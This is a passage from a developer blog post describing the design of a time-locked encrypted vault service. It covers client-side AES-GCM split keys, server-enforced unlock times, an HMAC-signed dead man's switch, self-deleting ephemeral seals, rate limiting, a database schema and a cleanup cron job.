class="nf">deriveKey</span><span class="p">(</span><span class="nx">keyA</span><span class="p">,</span> <span class="nx">keyB</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">encrypted</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">crypto</span><span class="p">.</span><span class="nx">subtle</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">AES-GCM</span><span class="dl">'</span><span class="p">,</span> <span class="nx">iv</span> <span class="p">},</span> <span class="nx">combinedKey</span><span class="p">,</span> <span class="nx">plaintext</span> <span class="p">);</span> </code></pre> </div> <ul> <li> <strong>Key A</strong>: Stored in the URL hash (<code>#keyA</code>), never transmitted to server </li> <li> <strong>Key B</strong>: Sent to server, encrypted with master key, stored in database </li> </ul> <blockquote> <p>The server refuses to release Key B until <code>Date.now() &gt;= unlockTime</code>. Without both keys, decryption is cryptographically impossible.</p> </blockquote> <h2> Architecture Deep Dive </h2> <h3> Layer 1: Client-Side Encryption </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// crypto-utils.ts</span> <span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">encryptContent</span><span class="p">(</span> <span class="nx">content</span><span class="p">:</span> <span class="kr">string</span><span class="p">,</span> <span class="nx">keyA</span><span class="p">:</span> <span class="nb">Uint8Array</span><span class="p">,</span> <span class="nx">keyB</span><span class="p">:</span> <span class="nb">Uint8Array</span> <span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="nx">EncryptedBlob</span><span class="o">&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">iv</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">getRandomValues</span><span class="p">(</span><span class="k">new</span> <span class="nc">Uint8Array</span><span class="p">(</span><span class="mi">12</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">combinedKey</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">importKey</span><span class="p">(</span><span class="nf">combineKeys</span><span class="p">(</span><span class="nx">keyA</span><span class="p">,</span> <span class="nx">keyB</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">ciphertext</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">crypto</span><span class="p">.</span><span class="nx">subtle</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">AES-GCM</span><span class="dl">'</span><span class="p">,</span> <span class="nx">iv</span> <span class="p">},</span> <span class="nx">combinedKey</span><span class="p">,</span> <span class="k">new</span> <span class="nc">TextEncoder</span><span class="p">().</span><span class="nf">encode</span><span class="p">(</span><span class="nx">content</span><span class="p">)</span> <span class="p">);</span> <span class="k">return</span> <span class="p">{</span> <span class="na">blob</span><span class="p">:</span> <span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">ciphertext</span><span class="p">),</span> <span class="na">iv</span><span class="p">:</span> <span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">iv</span><span class="p">),</span> <span class="na">keyB</span><span class="p">:</span> <span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">keyB</span><span class="p">)</span> <span class="p">};</span> <span class="p">}</span> </code></pre> </div> <p><strong>Why AES-GCM?</strong></p> <ul> <li>Authenticated encryption (prevents tampering)</li> <li>Native browser support (<code>Web Crypto API</code>)</li> <li>Fast and secure (256-bit keys)</li> </ul> <h3> Layer 2: Server-Side Key Protection </h3> <p>Key B is encrypted before database storage:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// api/seal/route.ts</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">encryptKeyB</span><span class="p">(</span><span class="nx">keyB</span><span class="p">:</span> <span class="kr">string</span><span class="p">,</span> <span class="nx">sealId</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="kr">string</span><span class="o">&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">masterKey</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">deriveMasterKey</span><span class="p">(</span> <span class="nx">env</span><span class="p">.</span><span class="nx">MASTER_ENCRYPTION_KEY</span><span class="p">,</span> <span class="nx">sealId</span> <span class="p">);</span> <span class="kd">const</span> <span class="nx">iv</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">getRandomValues</span><span class="p">(</span><span class="k">new</span> <span class="nc">Uint8Array</span><span class="p">(</span><span class="mi">12</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">encrypted</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">crypto</span><span class="p">.</span><span class="nx">subtle</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">AES-GCM</span><span class="dl">'</span><span class="p">,</span> <span class="nx">iv</span> <span class="p">},</span> <span class="nx">masterKey</span><span class="p">,</span> <span class="nf">base64ToArrayBuffer</span><span class="p">(</span><span class="nx">keyB</span><span class="p">)</span> <span class="p">);</span> <span class="k">return</span> <span class="s2">`</span><span class="p">${</span><span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">iv</span><span class="p">)}</span><span class="s2">:</span><span class="p">${</span><span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">encrypted</span><span class="p">)}</span><span class="s2">`</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p><strong>Defense in depth:</strong></p> <ul> <li>Master key stored as environment secret (not in database)</li> <li>Per-seal key derivation using <code>HKDF</code> </li> <li>Even with database access, attacker needs <code>master key + Key A</code> </li> </ul> <h3> Layer 3: Time-Lock Enforcement </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// api/unlock/route.ts</span> <span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">GET</span><span class="p">(</span><span class="nx">request</span><span class="p">:</span> <span class="nx">Request</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">sealId</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">parseRequest</span><span class="p">(</span><span class="nx">request</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">seal</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="dl">'</span><span class="s1">SELECT * FROM seals WHERE id = ?</span><span class="dl">'</span><span class="p">,</span> <span class="nx">sealId</span><span class="p">);</span> <span class="c1">// Server-side time check (client clock irrelevant)</span> <span class="k">if </span><span class="p">(</span><span class="nb">Date</span><span class="p">.</span><span class="nf">now</span><span class="p">()</span> <span class="o">&lt;</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">unlock_time</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">Response</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span> <span class="p">{</span> <span class="na">status</span><span class="p">:</span> <span class="dl">'</span><span class="s1">LOCKED</span><span class="dl">'</span><span class="p">,</span> <span class="na">countdown</span><span class="p">:</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">unlock_time</span> <span class="o">-</span> <span class="nb">Date</span><span class="p">.</span><span class="nf">now</span><span class="p">()</span> <span class="p">},</span> <span class="p">{</span> <span class="na">status</span><span class="p">:</span> <span class="mi">403</span> <span class="p">}</span> <span class="p">);</span> <span class="p">}</span> <span class="c1">// Decrypt Key B and release</span> <span class="kd">const</span> <span class="nx">keyB</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">decryptKeyB</span><span class="p">(</span><span class="nx">seal</span><span class="p">.</span><span class="nx">encrypted_key_b</span><span class="p">,</span> <span class="nx">sealId</span><span class="p">);</span> <span class="k">return</span> <span class="nx">Response</span><span class="p">.</span><span class="nf">json</span><span class="p">({</span> <span class="na">status</span><span class="p">:</span> <span class="dl">'</span><span class="s1">UNLOCKED</span><span class="dl">'</span><span class="p">,</span> <span class="nx">keyB</span><span class="p">,</span> <span class="na">blob</span><span class="p">:</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">encrypted_blob</span><span class="p">,</span> <span class="na">iv</span><span class="p">:</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">iv</span> <span class="p">});</span> <span class="p">}</span> </code></pre> </div> <blockquote> <p><strong>Why Cloudflare Workers?</strong></p> <ul> <li>NTP-synchronized time across global network</li> <li>No root access (can't manipulate system time)</li> <li>Edge-native (low latency worldwide)</li> <li>Scales automatically</li> </ul> </blockquote> <h2> Dead Man's Switch Implementation </h2> <blockquote> <p>The most interesting feature is the Dead Man's Switch: content auto-unlocks if you stop checking in.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Pulse token structure</span> <span class="kr">interface</span> <span class="nx">PulseToken</span> <span class="p">{</span> <span class="nl">sealId</span><span class="p">:</span> <span class="kr">string</span><span class="p">;</span> <span class="nl">nonce</span><span class="p">:</span> <span class="kr">string</span><span class="p">;</span> <span class="c1">// Prevents replay attacks</span> <span class="nl">signature</span><span class="p">:</span> <span class="kr">string</span><span class="p">;</span> <span class="c1">// HMAC-SHA256</span> <span class="p">}</span> <span class="c1">// api/pulse/route.ts</span> <span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">POST</span><span class="p">(</span><span class="nx">request</span><span class="p">:</span> <span class="nx">Request</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">token</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">request</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">sealId</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">,</span> <span class="nx">signature</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">parseToken</span><span class="p">(</span><span class="nx">token</span><span class="p">);</span> <span class="c1">// Check nonce FIRST (atomic operation)</span> <span class="kd">const</span> <span class="nx">nonceExists</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="dl">'</span><span class="s1">SELECT 1 FROM used_nonces WHERE nonce = ?</span><span class="dl">'</span><span class="p">,</span> <span class="nx">nonce</span> <span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">nonceExists</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Replay attack detected</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Verify signature</span> <span class="kd">const</span> <span class="nx">valid</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">verifyHMAC</span><span class="p">(</span><span class="nx">signature</span><span class="p">,</span> <span class="nx">sealId</span> <span class="o">+</span> <span class="nx">nonce</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">valid</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Invalid signature</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Atomic update: mark nonce + extend deadline</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">transaction</span><span class="p">(</span><span class="k">async </span><span class="p">(</span><span class="nx">tx</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">tx</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="dl">'</span><span class="s1">INSERT INTO used_nonces (nonce) VALUES (?)</span><span class="dl">'</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">);</span> <span class="k">await</span> <span class="nx">tx</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="dl">'</span><span class="s1">UPDATE seals SET unlock_time = ? WHERE id = ?</span><span class="dl">'</span><span class="p">,</span> <span class="nb">Date</span><span class="p">.</span><span class="nf">now</span><span class="p">()</span> <span class="o">+</span> <span class="nx">pulseInterval</span><span class="p">,</span> <span class="nx">sealId</span> <span class="p">);</span> <span class="p">});</span> <span class="p">}</span> </code></pre> </div> <p><strong>Security considerations:</strong></p> <ul> <li>Nonce-first validation prevents concurrent replay attacks</li> <li> <code>HMAC</code> signature prevents token forgery</li> <li>Atomic transactions prevent race conditions</li> <li>Database-backed nonce storage (persists across worker instances)</li> </ul> <h2> Ephemeral Seals: Self-Destructing Messages </h2> <p>Ephemeral seals auto-delete after N views:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// api/unlock/route.ts (ephemeral mode)</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">handleEphemeralUnlock</span><span class="p">(</span><span class="nx">seal</span><span class="p">:</span> <span class="nx">Seal</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Atomic view increment + check</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="s2">` UPDATE seals SET view_count = view_count + 1 WHERE id = ? AND view_count &lt; max_views RETURNING view_count, max_views `</span><span class="p">,</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">result</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Max views exceeded</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Auto-delete if exhausted</span> <span class="k">if </span><span class="p">(</span><span class="nx">result</span><span class="p">.</span><span class="nx">view_count</span> <span class="o">&gt;=</span> <span class="nx">result</span><span class="p">.</span><span class="nx">max_views</span><span class="p">)</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="dl">'</span><span class="s1">DELETE FROM seals WHERE id = ?</span><span class="dl">'</span><span class="p">,</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="p">{</span> <span class="na">keyB</span><span class="p">:</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">key_b</span><span class="p">,</span> <span class="na">viewsRemaining</span><span class="p">:</span> <span class="nx">result</span><span class="p">.</span><span class="nx">max_views</span> <span class="o">-</span> <span class="nx">result</span><span class="p">.</span><span class="nx">view_count</span> <span class="p">};</span> <span class="p">}</span> </code></pre> </div> <p><strong>Use cases:</strong></p> <ul> <li>One-time passwords (<code>maxViews=1</code>)</li> <li>Confidential documents (<code>maxViews=5</code>)</li> <li>Shared secrets (<code>maxViews=10</code>)</li> </ul> <h2> Security Hardening </h2> <h3> Rate Limiting with Browser Fingerprinting </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// lib/rate-limit.ts</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">getRateLimitKey</span><span class="p">(</span><span class="nx">request</span><span class="p">:</span> <span class="nx">Request</span><span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="kr">string</span><span class="o">&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">CF-Connecting-IP</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">ua</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">User-Agent</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">lang</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">Accept-Language</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// SHA-256 hash for privacy</span> <span class="kd">const</span> <span class="nx">fingerprint</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">crypto</span><span class="p">.</span><span class="nx">subtle</span><span class="p">.</span><span class="nf">digest</span><span class="p">(</span> <span class="dl">'</span><span class="s1">SHA-256</span><span class="dl">'</span><span class="p">,</span> <span class="k">new</span> <span class="nc">TextEncoder</span><span class="p">().</span><span class="nf">encode</span><span class="p">(</span><span class="s2">`</span><span class="p">${</span><span class="nx">ip</span><span class="p">}</span><span class="s2">:</span><span class="p">${</span><span class="nx">ua</span><span class="p">}</span><span class="s2">:</span><span class="p">${</span><span class="nx">lang</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">);</span> <span class="k">return</span> <span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">fingerprint</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <blockquote> <p><strong>Why fingerprinting?</strong></p> <ul> <li>IP rotation doesn't bypass limits</li> <li>No PII stored (hashed fingerprints)</li> <li>Collision-resistant (<code>SHA-256</code>)</li> </ul> </blockquote> <h3> Replay Attack Prevention </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Timing attack mitigation</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">addRandomJitter</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">jitter</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nf">random</span><span class="p">()</span> <span class="o">*</span> <span class="mi">100</span><span class="p">;</span> <span class="c1">// 0-100ms</span> <span class="k">await</span> <span class="k">new</span> <span class="nc">Promise</span><span class="p">(</span><span class="nx">resolve</span> <span class="o">=&gt;</span> <span class="nf">setTimeout</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">jitter</span><span class="p">));</span> <span class="p">}</span> <span class="c1">// All responses include jitter</span> <span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">GET</span><span class="p">(</span><span class="nx">request</span><span class="p">:</span> <span class="nx">Request</span><span class="p">)</span> <span class="p">{</span> <span class="k">await</span> <span class="nf">addRandomJitter</span><span class="p">();</span> <span class="c1">// ... handle request</span> <span class="p">}</span> </code></pre> </div> <h3> Input Validation </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// lib/validation.ts</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">validateSealInput</span><span class="p">(</span><span class="nx">data</span><span class="p">:</span> <span class="nx">unknown</span><span class="p">):</span> <span class="nx">SealInput</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">schema</span> <span class="o">=</span> <span class="nx">z</span><span class="p">.</span><span class="nf">object</span><span class="p">({</span> <span class="na">blob</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">().</span><span class="nf">max</span><span class="p">(</span><span class="mi">750</span><span class="nx">_000</span><span class="p">),</span> <span class="c1">// 750KB limit</span> <span class="na">keyB</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">string</span><span class="p">().</span><span class="nf">length</span><span class="p">(</span><span class="mi">44</span><span class="p">),</span> <span class="c1">// Base64 32-byte key</span> <span class="na">unlockTime</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">number</span><span class="p">().</span><span class="nf">int</span><span class="p">().</span><span class="nf">positive</span><span class="p">(),</span> <span class="na">mode</span><span class="p">:</span> <span class="nx">z</span><span class="p">.</span><span class="nf">enum</span><span class="p">([</span><span class="dl">'</span><span class="s1">TIMED</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">DEADMAN</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">EPHEMERAL</span><span class="dl">'</span><span class="p">])</span> <span class="p">});</span> <span class="k">return</span> <span class="nx">schema</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Database Schema </h2> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">seals</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">TEXT</span> <span class="k">PRIMARY</span> <span class="k">KEY</span><span class="p">,</span> <span class="n">encrypted_blob</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">encrypted_key_b</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">iv</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">unlock_time</span> <span class="nb">INTEGER</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="k">mode</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">view_count</span> <span class="nb">INTEGER</span> <span class="k">DEFAULT</span> <span class="mi">0</span><span class="p">,</span> <span class="n">max_views</span> <span class="nb">INTEGER</span><span class="p">,</span> <span class="n">pulse_interval</span> <span class="nb">INTEGER</span><span class="p">,</span> <span class="n">created_at</span> <span class="nb">INTEGER</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">unlocked_at</span> <span class="nb">INTEGER</span><span class="p">,</span> <span class="n">access_count</span> <span class="nb">INTEGER</span> <span class="k">DEFAULT</span> <span class="mi">0</span> <span class="p">);</span> <span class="k">CREATE</span> <span class="k">INDEX</span> <span class="n">idx_unlock_time</span> <span class="k">ON</span> <span class="n">seals</span><span class="p">(</span><span class="n">unlock_time</span><span class="p">);</span> <span class="k">CREATE</span> <span class="k">INDEX</span> <span class="n">idx_mode</span> <span class="k">ON</span> <span class="n">seals</span><span class="p">(</span><span class="k">mode</span><span class="p">);</span> <span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">used_nonces</span> <span class="p">(</span> <span class="n">nonce</span> <span class="nb">TEXT</span> <span class="k">PRIMARY</span> <span class="k">KEY</span><span class="p">,</span> <span class="n">created_at</span> <span class="nb">INTEGER</span> <span class="k">NOT</span> <span class="k">NULL</span> <span class="p">);</span> <span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">audit_log</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">INTEGER</span> <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="n">AUTOINCREMENT</span><span class="p">,</span> <span class="n">seal_id</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">action</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">fingerprint</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="nb">timestamp</span> <span class="nb">INTEGER</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">metadata</span> <span class="nb">TEXT</span> <span class="p">);</span> </code></pre> </div> <h2> Auto-Cleanup System </h2> <p>Seals auto-delete 30 days after unlock:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// api/cron/cleanup/route.ts</span> <span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">GET</span><span class="p">(</span><span class="nx">request</span><span class="p">:</span> <span class="nx">Request</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">thirtyDaysAgo</span> <span class="o">=</span> <span class="nb">Date</span><span class="p">.</span><span class="nf">now</span><span class="p">()</span> <span class="o">-</span> <span class="p">(</span><span class="mi">30</span> <span class="o">*</span> <span class="mi">24</span> <span class="o">*</span> <span class="mi">60</span> <span class="o">*</span> <span class="mi">60</span> <span class="o">*</span> <span class="mi">1000</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">expiredSeals</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="s2">` SELECT id FROM seals WHERE unlocked_at IS NOT NULL AND unlocked_at &lt; ? `</span><span class="p">,</span> <span class="nx">thirtyDaysAgo</span><span class="p">);</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">seal</span> <span class="k">of</span> <span class="nx">expiredSeals</span><span class="p">)</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="dl">'</span><span class="s1">DELETE FROM seals WHERE id = ?</span><span class="dl">'</span><span class="p">,</span> <span class="nx">seal</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">Response</span><span class="p">.</span><span class="nf">json</span><span class="p">({</span> <span class="na">deleted</span><span class="p">:</span> <span class="nx">expiredSeals</span><span class="p">.</span><span class="nx">length</span> <span class="p">});</span> <span class="p">}</span> </code></pre> </div> <p><strong>Cloudflare Cron Trigger:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight toml"><code><span class="c"># wrangler.toml</span> <span class="nn">[triggers]</span> <span class="py">crons</span> <span class="p">=</span> <span class="p">[</span><span class="s">"0 2 * * *"</span><span class="p">]</span> <span class="c"># Daily at 2 AM UTC</span> </code></pre> </div> <h2> Frontend: Next.js 14 App Router </h2> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// app/create/page.tsx</span> <span class="dl">'</span><span class="s1">use client</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">CreateSeal</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">content</span><span class="p">,</span> <span class="nx">setContent</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">unlockTime</span><span class="p">,</span> <span class="nx">setUnlockTime</span><span class="p">]</span> <span class="o">=</span> <span class="nx">useState</span><span class="o">&lt;</span><span class="nb">Date</span><span class="o">&gt;</span><span class="p">();</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">handleCreate</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Generate keys in browser</span> <span class="kd">const</span> <span class="nx">keyA</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">getRandomValues</span><span class="p">(</span><span class="k">new</span> <span class="nc">Uint8Array</span><span class="p">(</span><span class="mi">32</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">keyB</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">getRandomValues</span><span class="p">(</span><span class="k">new</span> <span class="nc">Uint8Array</span><span class="p">(</span><span class="mi">32</span><span class="p">));</span> <span class="c1">// Encrypt content</span> <span class="kd">const</span> <span class="nx">encrypted</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">encryptContent</span><span class="p">(</span><span class="nx">content</span><span class="p">,</span> <span class="nx">keyA</span><span class="p">,</span> <span class="nx">keyB</span><span class="p">);</span> <span class="c1">// Send to server (Key A never transmitted)</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/seal</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">({</span> <span class="na">blob</span><span class="p">:</span> <span class="nx">encrypted</span><span class="p">.</span><span class="nx">blob</span><span class="p">,</span> <span class="na">keyB</span><span class="p">:</span> <span class="nx">encrypted</span><span class="p">.</span><span class="nx">keyB</span><span class="p">,</span> <span class="na">iv</span><span class="p">:</span> <span class="nx">encrypted</span><span class="p">.</span><span class="nx">iv</span><span class="p">,</span> <span class="na">unlockTime</span><span class="p">:</span> <span class="nx">unlockTime</span><span class="p">.</span><span class="nf">getTime</span><span class="p">()</span> <span class="p">})</span> <span class="p">});</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">sealId</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="c1">// Build vault link with Key A in hash</span> <span class="kd">const</span> <span class="nx">vaultLink</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">origin</span><span class="p">}</span><span class="s2">/vault/</span><span class="p">${</span><span class="nx">sealId</span><span class="p">}</span><span class="s2">#</span><span class="p">${</span><span class="nf">arrayBufferToBase64</span><span class="p">(</span><span class="nx">keyA</span><span class="p">)}</span><span class="s2">`</span><span class="p">;</span> <span class="c1">// Show link to user</span> <span class="nf">setVaultLink</span><span class="p">(</span><span class="nx">vaultLink</span><span class="p">);</span> <span class="p">}</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">form</span> <span class="nx">onSubmit</span><span class="o">=</span><span class="p">{</span><span class="nx">handleCreate</span><span class="p">}</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">textarea</span> <span class="nx">value</span><span class="o">=</span><span class="p">{</span><span class="nx">content</span><span class="p">}</span> <span class="nx">onChange</span><span 